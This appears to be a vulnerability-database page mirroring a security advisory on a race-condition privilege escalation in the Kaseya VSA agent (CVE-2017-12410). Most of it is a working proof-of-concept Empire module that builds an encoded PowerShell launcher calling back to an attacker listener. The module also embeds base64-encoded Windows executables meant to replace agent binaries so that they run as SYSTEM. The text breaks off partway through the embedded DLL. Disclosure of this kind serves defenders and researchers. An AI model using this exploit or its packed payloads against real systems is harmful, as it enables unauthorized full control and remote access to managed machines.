Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kaseya Virtual System Administrator (VSA) Local Privilege Escalation

🗓️ 23 Mar 2018 00:00:00Reported by Filip PalianType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 127 Views

Local Privilege Escalation vulnerability found in Kaseya Virtual System Administrator (VSA) agent "AgentMon.exe" allows Windows users in "Authenticated Users" group to modify and run arbitrary executables with "NT AUTHORITY\SYSTEM" privileges by exploiting a Time of Check & Time of Use (TOCTOU) issue. PoC uses Empire module to replace files in working and temp folders

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Kaseya VSA agent 9.5 - Privilege Escalation Vulnerability
2 Sep 201900:00
zdt
CNVD		Kaseya Virtual System Administrator agent local elevation of privilege vulnerability
12 Apr 201800:00
cnvd
CVE		CVE-2017-12410
26 Mar 201821:00
cve
Cvelist		CVE-2017-12410
26 Mar 201821:00
cvelist
Exploit DB		Kaseya VSA agent 9.5 - Privilege Escalation
2 Sep 201900:00
exploitdb
EUVD		EUVD-2017-3983
7 Oct 202500:30
euvd
exploitpack		Kaseya VSA agent 9.5 - Privilege Escalation
2 Sep 201900:00
exploitpack
NCSC		Vulnerabilities fixed in Kaseya Virtual System Administrator (VSA)
12 Jul 202100:00
ncsc
NVD		CVE-2017-12410
26 Mar 201821:29
nvd
OpenVAS		Kaseya Virtual System Administrator Agent <= 9.4.0.36 Local Privilege Escalation Vulnerability
30 May 201800:00
openvas
Rows per page
`Hey,  
  
The Local Privilege Escalation vulnerability was found in the Kaseya  
Virtual System Administrator (VSA) [1] agent "AgentMon.exe". The agent is a  
Windows service that periodically executes various programs with aNT  
AUTHORITY\SYSTEMa privileges.  
  
In the Kaseya's default configuration, Windows users who belong to the  
aAuthenticated Usersa group can modify files residing in the working and  
temporary directories e.g.:  
- "HKLM\SOFTWARE\Kaseya\Agent\...\TempPath"  
- "C:\Temp"  
- "C:\kworking"  
  
The list of executables that are stored in these directories and are run by  
the agent includes, but is not limited to:  
- "C:\kworking\NetUserStateAudit.exe"  
- "C:\kworking\KLicense.exe"  
- "C:\Temp\kwami.dll"  
  
The VSA agent before running the executables performs verification if the  
files were modified. If it detects that was the case, then it restores them  
to their known-good originals. However, this process was found to suffer  
from a Time of Check & Time of Use (TOCTOU) issue and that it is possible  
to win a race condition which makes it possible to run arbitrary  
executables with "NT AUTHORITY\SYSTEM" privileges.  
  
The PoC exploiting this vulnerability is included below. The PoC is an  
Empire module (https://github.com/EmpireProject/Empire) and it currently  
supports exploitation by replacing one of the following files:  
- "C:\kworking\NetUserStateAudit.exe" ($exe in PoC)  
- "C:\Temp\kwami.dll" ($dll in PoC)  
  
--  
$ cat > kaseya.py << EOF  
from lib.common import helpers  
  
class Module:  
def __init__(self, mainMenu, params=[]):  
self.info = {  
'Name': 'Kaseya AgentMon.exe <= 9.3.0.11 - Local Privilege Escalation',  
'Author': ['[email protected]'],  
'Description': (  
'It\'s possible to exploit TOCTOU vulnerability in Kaseya '  
'AgentMon.exe service by winning a race condition when it tries '  
'to execute binaries from its working and/or temp folder.'),  
'Background': False,  
'OutputExtension': None,  
'OpsecSafe': False,  
'Language' : 'python',  
'NeedsAdmin' : False,  
'MinLanguageVersion' : '2.6',  
'Comments': [  
'http://kaseya.com/'  
]  
}  
  
self.options = {  
'Agent': {  
'Description' : 'Agent to run on.',  
'Required' : True,  
'Value' : ''  
},  
'Listener' : {  
'Description' : 'Listener to use.',  
'Required' : True,  
'Value' : ''  
},  
'UserAgent' : {  
'Description' : 'User-agent string to use for the staging ' \  
+ 'request (default, none, or other).',  
'Required' : False,  
'Value' : 'default'  
},  
'Proxy' : {  
'Description' : 'Proxy to use for request (default, none, or' \  
+ 'other).',  
'Required' : False,  
'Value' : 'default'  
},  
'ProxyCreds' : {  
'Description' : 'Proxy credentials ([domain\]username:' \  
+ 'password) to use for request (default,' \  
+ 'none, or other).',  
'Required' : False,  
'Value' : 'default'  
},  
'Executable': {  
'Description' : 'Name of the exacutable to replace in working' \  
+ 'folder (default or other).',  
'Required' : False,  
'Value' : 'default'  
},  
'Path': {  
'Description' : 'Working or temp folder to use (default, work,' \  
+ 'temp).',  
'Required' : False,  
'Value' : 'default'  
},  
}  
  
self.mainMenu = mainMenu  
  
if params:  
for param in params:  
option, value = param  
if option in self.options:  
self.options[option]['Value'] = value  
  
def generate(self):  
listenerName = self.options['Listener']['Value']  
userAgent = self.options['UserAgent']['Value']  
proxy = self.options['Proxy']['Value']  
proxyCreds = self.options['ProxyCreds']['Value']  
execName = self.options['Executable']['Value']  
path = self.options['Path']['Value']  
  
if not self.mainMenu.listeners.is_listener_valid(listenerName):  
print helpers.color("[!] Invalid listener: " + listenerName)  
return ""  
else:  
launcher = self.mainMenu.stagers.generate_launcher(  
listenerName,  
language='powershell',  
encode=True,  
userAgent=userAgent,  
proxy=proxy,  
proxyCreds=proxyCreds  
)  
  
if launcher == "":  
print helpers.color("[!] Error in launcher generation.")  
return ""  
else:  
encLauncher = " ".join(launcher.split(" ")[1:])  
  
script = '''  
\$exe = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAAAAAAAAAAAAAAAAOAADwMLAQIcACAAAAAQAAAAgAAAcKMAAACQAAAAsAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADAAAAAEAAAAAAAAAMAQAEAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAACwAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAELEAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4pQAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAAAIAAAAAQAAAAAAAAAAIAAAAAAAAAAAAAAAAAAIAAAOBVUFgxAAAAAAAgAAAAkAAAABYAAAACAAAAAAAAAAAAAAAAAABAAADgVVBYMgAAAAAAEAAAALAAAAACAAAAGAAAAAAAAAAAAAAAAAAAQAAAwDMuOTEAVVBYIQ0JAgj1gi7MmnzBQeWEAABaEwAAAC4AACYCAPPt/93888ONtCYAjbwnBoPsHDHAZoE9CZLNbf9AAE1axwWMUwcBFwmIu5+cZIQkUHRoowgKoZjdrft3GYXAdErHBCQCFugEF1gL//PtvnMACwpsixWoIaPgBOTb/e5yoZxhiRAbB1yDPRgwTXRtfx/WDXuDxByWPQFJ67Rmr/vttpBBPJmBup9QRbaKCfdvu/11gA+3URi2+gs/PwYCD4VqdJu5e3eDuYQ8Dg+GXQyLkfhdhfb5u/vSD5XA6Z9EjXZf8BlACdx45OTTfYN5dDAsiejJ/e6FNn8fLKGAucdEJBAAUG47T44HCBAEFE8YBtu3db+jG6EgBIkYDL1gWyz73922wz9VTrkRVYnlV1aNVaRTiddR/u3Pfnzzq7gw5BacKcSNMRuD4PDHAMxOTs7uAMdABAYIDBB/Tk5OFBgcg+Twi+9uYYQ1h/YDjrRkoRjFI/wb/vaLWASLPVxv6xQ5ww+EFQJc6I/w77YDBv+DBInw8A+xHejAdd6hYobtu+wIMduD+AEp/oAPFoTf1hgMTTYFBPcWd9tuLCTzDoXbBxEfoVxAQ4TDGAYcHMQcH9pvQgLMDv/QbxMMHLBzbw99Hiv/FViXhKOs/XGE7lolEJIXjDVMoZD9PbjNHXTcG+yLW1sxyb8Lv6HHv4TSdCyD4fUnuY+DwP/W/m+KthCA+iB+54nLg5MJIg9Ey+vojS37Nox23y91EesZD2F3N9srfwo2GvGj2GSLHT82vvsf23QW9kXQAbgKJmYPRUXUY8DD/2kW1zAYRZCJxo0EhQTMbIXO8EWMiUqwCHUMlL/g/ihnCg+OQ5NEif6LBJ5vn/1nHxbwjXgBiTwqi02UFZmLDBV2he2eg8MTfCkiiUwowoXb/xsAOV2QdcmLVoPotHWUEeA4vd8Gq4k1ViyDsaVHyRILeT6hBmOzsw1roRQIBKFyBXa4T0t0DZujDATJhLW/S4fmSTnBCHUKbUChEUb4fxuNZfRbXl9dw9O7TaSG0g3YhQL+CJEfhOzeSRhI8oUNGWwIcBUKJyezcDg4qzGW2+Ek8SXv/YdXm3DrTUECUIkUDRVA7RBng3G2Ad4rASUYSwwIT78hMzoxfANCZJuwPhcojbavDEGY9rf0EBpsZwxYbI22HzR2JBMAkABV8Y3xrYgiGKEsMLE8x0BrvG32kDiiE7o4CZxCZIvwDkBUHDyw7X7uwsJBdAkyPf/SCGAVC25Yj7cGjMm/X1KQ7ibDZQCN4aL/cfwZIHURtlFENM5dFCiTZz3YEAcMJEBdQEB4cg/pT0BAQKHogEUY237j3Wz0uBFL/MmNYfxpUxS4wCF8KKHkU/0KVvj/EE5a6BEY94KACMgL+yVsMCUioeAQ9tE93ByNA1YHGFWLA5y9D8IwhGiJw4sVLWxgwd4IzIsuEGi+8BGB6ffgdSiJ2FvdWQjWn0NDrBTDOgdLehaPfyIgdKBrMLvMcpSVMFg/vJ7A99hHoQQwAR92rFDA2k8FEY1QnYaud4EpiRULv+nkpYZCB9l0gg8Yz4+96d2wJ2z7/3Qh1Az/FJ0P6wF1tS0Iu/SnsBazMxiJ9F7aLq7rApONuYsUhSVtp5fdI/DryZ+hHDh9BweBjbdekF9cHAvrlMYS3A/f/yWE2O+7FXAMhP1v9sJAeMmSvyQwQO395MD9Pz1O5kC7dA/30KMoHS8zRmiIj30QMUSSPbFt24tcDzMDFBAsPMUTPsuzBzDHSMaNlxvugm0OVC8PMdgznDHo4b1x9jH4MfBlF7z30qOFNG/3H1hturAZv0S4TyLr4d9bDdtIHyjlIMgJ68DJxAZbkwS2BPm0uhpmDJF5UWP47MQ/vmgsC0UIo+wCYSUBx3tF8KFjrOlxm43UN1RoaA8IKGFj0tib52W/YGU+G2ck4dg/HyTVA7wRa8N0FIYQuKggwgwAbATjI4+LVCQoq0RUK2C7CFRAEjwnP90WDwmNFHoUngIeK9Z+WHQK2wz/AnQSV4htu+p0OjgUQCI/1P2va7swnb4EOd505YsDhgIkrEHbjMMEDkApcXqvczZTKNUTS5Yy3pbck+uoZh+Na93W8DyhlEDdJ0gDUFwFzy3svlh0KdnK2UDd9xgD2a6E6boQD0QLKAgPjO39A1nQ6wbd2AGGPJ/ueiXcb1VQ8xdQZuD/kf5fuWBArECLEIPqAYP6BXcH2Bbr3oSVfEF0QF0GEGhrT12LcwYQV0y4xPrwLNryz6GkmsBAsF/swQwgMcBvANvjzwtCpLd/iG8Pip0CFh+fTttDMPjqGwUsjXokDEKzHSSUQWlFEGEx2CI/GgjlhilhxzgW0CnrDX9ufk8WGjARoI7Zgz2k/397LN2NVwSfCjnBdw6LegQDTwg5yA98YYnDgrL3j4O9OfN14igVdk+SxlYULIdhBv/5FkPYPTWNHFvB4wK+BsFg4YlGGQZbFwlf0/YDRwwQBIEUzhzzGeMIuKcdGATWcL/16BgMNW0cufyD4vt0/V5oiTbpQPS/dC7gAx3rgkXgMfxCFRT272ZkrAxBbBAVgwXYbXCZbq7EML285QsamMXtsCE0UCoEQg67H8seknyFhkcIH9BBzD09IIl0JJWwEw8wgmlSJv9CTIbFCS1EnBQNKNBLYrD/nHwUnG7RNbQQQBMeDsG5weDRi230WdLHpADO9teM3B+jjLiARQQtjxa2l2QHfqgEC59sbB974MiARYWHcIQMdX6hiPB0z3YIvowahEknvovvm8aigI0GsYPGDIH+FBtsbeoPg1e/iV2uBjlW3hgtbO1+k4g6gAWzbb038hCNnwiQxEkZZhnZNhEgCIgIWIsFOcKJVA1gQmtc3SI9D/r+xF9aixbsG/u9dwgDl1CNh1bTMtwtHmN77IlpcteLL6GEwH8a3QgWG6UML59rOx3fI9z9Fw+NpFWNPFunjTS9HQH4FoVSy+Zj2o1NzMKIwclQTCTqSsOkT1uz4jJFyJ3ojGMc4QS450XYPkXMOU8I0g/riYn2j0M+hVHhq4X/QR7yTr2xRjvXI6eKpA0p8td2e2/qidANtv9mg78Nq0jQUbcW6/7EKcoB0IlY2O0pCmaJNvcSYv+GgnxI+cButfBFUG2OE/KBz7ch6+5M/4A7SNdFtgqIA/2y0t/rvV7IAwNzGok766bbGf8aytsB8YtBxUECQCEjXBnIRLosQBMh65CQb0EgcL/dorZEPZGtwHdNPY0GgvX7VNT5PQUKheeH6gQ4A4ALm/gItnTG6Sp6LxjbAVsY+Te44VvCMPe7gHuQPZRBrj2WSISpU00jwd+TEVehrBs9xiBcFukXav/gP2YIFmzkhKQAyBhmloV7sWM4Zo9sCBzCP3XERxjRsQMMTUfrtgP2sYOfPR3xXv///0oE2fs4IHRcXz0gGLEBtrDxZxyVDNgN7g+rkB4LKIAd2GYfBD7D0AFBLyi4P8FZLPRqJPfPU9oTXa/vLWQOPe6ZKG9cd8DHA+jV0Mb/1zdNbBuXHfZ0JUMONB6LzGKy21sIJ3XbTVB83NqEXBdqP20x9iZGgl0RobQIEM90wYLbifAcw5CPrwy4gwcWlxbIG8N0Q+2Lgx24WIkDSol0sNhgZ6+hrom3I+hcS/ZDCH9hZmS+xBssRpqMoL8FGLrHix+MtJAPeyaEZUtuW48YFYP/XcFpMxeLAjnDdQrrTovX1r1QYdka7otCCD/x+y1xwlZPi0haSt0jOwg1Fxgs69FFoyhJ3XpkEevaXx7adUSQs49Aci02GHcds4agdbjED0wQnOtCjxiGCF+CPySBjWAtdiKBhet3ET7eDL3eMjkRi1iDW4VkjLkJde9MbMgWZLAJtKZYsgY5IJ7fgofNaHYXLQV9jREb5LJ2OkzXq+yI/9p9EokvA0A8gThodAbZ9rsqJoXDZoF4GAvrlAz8/haL3xI4TVp0BTEP684NNRJST0+nDNou8FOzA1I8I3IGA0IW2781uJ1EAhh0GzHJP1BoiV+40NqAA1Cl03IMg8HK8XgNf8AoOfF16JNen/+x4I4Kh/V8JDA5eEjxjRYt+Ah3C6R0C+3eSey/idiTuBMkExx73c3d9OehPA1xkBQGBRkLGi8sdGgGWRBL7XQn6EZ7MvD/RreJXoa2At3YHF7oOa3DicMUbFdY7opcMdtea5eWda/Sd2rQw51xgXWRCUruDHUtmeXsget7cFSQIbLcDqP5b0L/w3JCndrJycPC0lx2DpuwkW9t798GELBDDKMvL4AB76h5tnQOidBfG0CYsD/kH1ij3xWoNU0HNvZCJyB0ETN8iQcTdLiD6ZuelIUstoXpnm+fOxnusQsPRdAWjzHAL6cQDAFPP42QaASEZ4+AFEA+RyzT8DhAICU/jwsZ5NNyEvOfcXqh20AkCPfQjR/r8K87AkKhTvYhl3QMsSnhX+Bfw422H+aNts4dQjqABRTRhnneWFg6xVH/KRHFwYtKPLqW2YLINgYSOBBh1jUj/oL2WFjaSvAuh+vvf3WhFMDldtFlZnUHvKnqsfhfpdt/6ItwDFuBxmvwXl9ECdrLIVFQqyReo98vNgxyFYHpC4MJNAeCu93HGHfrKcEQWFky/yXgDDLIdnsH3NjUMsggg9DMyMgggwzEwLwggwwyuLSwgwwyyKigmJQMMsggjIh8OmAjg3hmAaHU2K+A4X2fT4cFFMKuwYifXYwE/A++WT8IIaAn9gsAJaOqygBhXXRDCgPAT/8A5LqRuw8CAACAF5ADyqJFXTCxFipRZaGqAP///wRsaWJnY2otMTYuZGxsAF9Kdl9SZWdpc///3f90ZXJDbGFzc2VzIy1ub3AgLXcgaGlkZGVuIC5ct7f/t2sZZXlhLnBzMQBwb3cqc2hlPC5l0UVs7XhlACggACtAte3tEvwAGQNVbms9dzT9d9+9JHJvcktfbWF0aAwoKTogJXMgaW51/9/eBSglZywGZykgIChyZXR2YWw9DArBtm+/K0FyZ3VtT3QgZG81aUOtXfZvI0RPTUFJTikecxsJt7u3b61yaXR5HVNJRxsAT3YtZmz+h21veSByYRxlOk9WRVJGTE9XtdZa2yBUhBrdNj7btda+7SB0b29FY8QJIGIZw9527nAcW2VkNFVORDV7oW1vAFRvdCYgWBogb2Z5d7ttv2duaWZpY2NjNChUI1NTJEGmsFtQinRpJVBNt0RsAJxOuwPY+IWuWTYwQVRNz3dvdrtt2zY0h3WCaeMgZv5sdZGwucLCOhRBgplWJWutsLCRaIUgW7634LYbtm0trGMpb3sgVml9dboutl1RdfN5OMNm/CXWCq3dBmJ50DOAAkW3MNlLhzNQJHRHL3zhMDV3UGggY2/zIDB44cIQ3iV4J835ZXWUa681Qybi1XcROttraJsLb/R3cxBuLtiHF9kKADNiabt6ZStoLGx8R0NDFCi+VQlk28bfjjIuMSAyMJcxADgbIKz9fDMuMDcwNR8bCMAG2VMbsgFhDEtTGVVVFgCVjKoqAkJGVQByZQ88ZRO428MCyMgA8GEDCE3TFYBi9wM0SmA0TdM0cISWqMLTuU3T0u4GYy8DPkzTNE1GWmiElmmarvsApge0A8TQ4NM0y6byBmQQHihN0zRNMj5GTlhgNE3TNGpyfIaQ0zRN05qkrrjABZH9TMwA1mTPsCmqsABgA8gOWYAAFGADMHpgKwAoYEJRWAogAKBDPkEwEUAAECZo2QV5UBcPwwGqyuKwGEAV+0BUZQCAQAAcA6qS4LKQUyBw6xFVWagAfyNqd3wDIFFpRGVsZXRlGxAliENEqGyC+AyIU04BRW7ab0fmChVHKkN1cnJlHDUgNiAyY0nbAzuAEklkFFRoBWG9IH6wZBNMYXN0RRCLbd/+DU1vZHV7SGFuZAVBEUFxbAbE6A9TdO2zvwRRdXBJbmZvIFN5c5aLvfb2bVRpbTBzRmk2CRgIzbXWfmNrQ291bw0ttLNWtl3ZaXrUTIp2FbUgniAxUDZuzASxl22qR2Wjve2xbyF0VW5on2RFeBhwL9vW2sx2HBQQBlQLbdY9Ce1pbmESEFRsc5BWYASxwtx1mj+oWLKEeg+MIj4NBZaeeF9fd/u+FZ81ZXhpdAxnWW1hb/0W3HdyZ3MOaetkdgpsY/63L7YldhANcydfYXBwX3R5cGURItzBD3VzqoTB/m13EWFjbVhuCG1zZ19ede99sGMHZm1vZDZNrG2Gua37Cm9iBWzjawaP4BYKzwVmcFEwZgh1O8OuuDVmd2AHbWG4Y0PEdsEHsGNw0gENEFvYNRIHdHIPbgfwrNCwbG1CX25XYWLwbLKugU92UGNCAJQFR8TTDehTcEqgZmwLMHVhQcj/J4ybo0wBB9zgAA8DCwECHAAYdV3XdQwqAwQTFAcQAzA2O3b2IUALAhoAASIAdW17dpAMqFwDAycaILNkwZ4rABAHBgD9FUm3YALUBYgEgAAAGNlGNIAXIIDQN2C7CwMuAXh0B8QXkMIPG9gYxJpQYC5k8wt7dthh9jDzABwne8Kzt0AYwC5yKIAFHgAGA8Pvp6weJ0AuYnNzC/ADfMm2LbCb0mBPaQPYIM/UYCR3Q2CDfd9SVAs0BHCfKieczcYOdGx3IGAnLAB0sZUbAMkAAAAa9wAJAAD/AGC+FZBAAI2+63///1eDzf/rEJCQkJCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97liAAAAigdHLOg8AXf3gD8CdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgCAAACLBwnAdDyLXwSNhDAAoAAAAfNQg8cI/5ZQoAAAlYoHRwjAdNyJ+VdI8q5V/5ZUoAAACcB0B4kDg8ME6+H/lmSgAACLrligAACNvgDw//+7ABAAAFBUagRTV//VjYefAQAAgCB/gGAof1hQVFBTV//VWI2eAPD//427GaUAAFcxwKpZSVBqAVP/0WGNRCSAagA5xHX6g+yA6chv///rGla+IHBAAPythcB0DWoDWf90JBDi+v/Q6+5ewgwAAFClQABspUAAkFNAAGylQAAAAAAAAAAAAAAAAAAAgEAAHIBAAJBTQAAgcEAAAAAAAAAAAAAYpUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfLAAAFCwAAAAAAAAAAAAAAAAAACJsAAAbLAAAAAAAAAAAAAAAAAAAJSwAAB0sAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgsAAArrAAAL6wAADOsAAA3LAAAOqwAAAAAAAA+LAAAAAAAAD+sAAAAAAAAEtFUk5FTDMyLkRMTABtc3ZjcnQuZGxsAFNIRUxMMzIuZGxsAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABFeGl0UHJvY2VzcwAAAF9pb2IAAFNoZWxsRXhlY3V0ZUEAAAAAoAAAGAAAAHIzHDU4NTw1QDVENWw1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="  
  
\$dll = "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